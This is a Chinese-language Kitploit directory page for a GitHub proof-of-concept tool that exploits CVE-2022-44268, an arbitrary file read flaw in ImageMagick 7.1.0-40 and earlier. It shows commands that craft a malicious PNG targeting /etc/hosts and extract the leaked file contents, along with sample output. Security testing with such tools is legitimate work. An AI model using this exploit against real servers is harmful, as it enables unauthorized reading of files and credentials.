Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
cve-2022-44268 — 生成恶意 PNG 文件,利用 ImageMagick LFI 漏洞(CVE-2022-44268)实现任意文件读取,并附带提取脚本用于概念验证。 | Kitploit
工具/GitHubGitHub/pog-frog/cve-2022-44268
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试红队
GitHubpog-frog/cve-2022-44268

cve-2022-44268

生成恶意 PNG 文件,利用 ImageMagick LFI 漏洞(CVE-2022-44268)实现任意文件读取,并附带提取脚本用于概念验证。

查看仓库
123年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2022-44268

ImageMagick 是一个免费开源的跨平台软件套件,用于显示、转换和编辑光栅图像和矢量图像文件。它可以读写超过200种图像文件格式。ImageMagick 遵循 Apache License 2.0 许可证。它以命令行工具、C API 和一组 C++ 类的形式提供。维基百科

ImageMagick 7.1.0-40 及更低版本存在一个本地文件包含漏洞。该漏洞是由于对用户提供的输入验证不当造成的。攻击者可以通过向目标发送特制的 PNG 文件来利用此漏洞。成功利用此漏洞可能允许攻击者读取目标系统上的任意文件。

致谢发现此漏洞的研究人员:

  • Bryan Gonzalez 和 Ocelot 团队

制作恶意 PNG 以利用 ImageMagick 7.1.0-40:

  • CVE-2022-44267:拒绝服务
  • CVE-2022-44268:信息泄露

要求

  • Python3
  • PIL(pip install Pillow)

使用方法

使用 generate.py 制作 PNG:

root@kitploit:~
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

概念验证 (PoC)

root@kitploit:~
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

免责声明:请做个好孩子,不要将其用于不良行为。

下载工具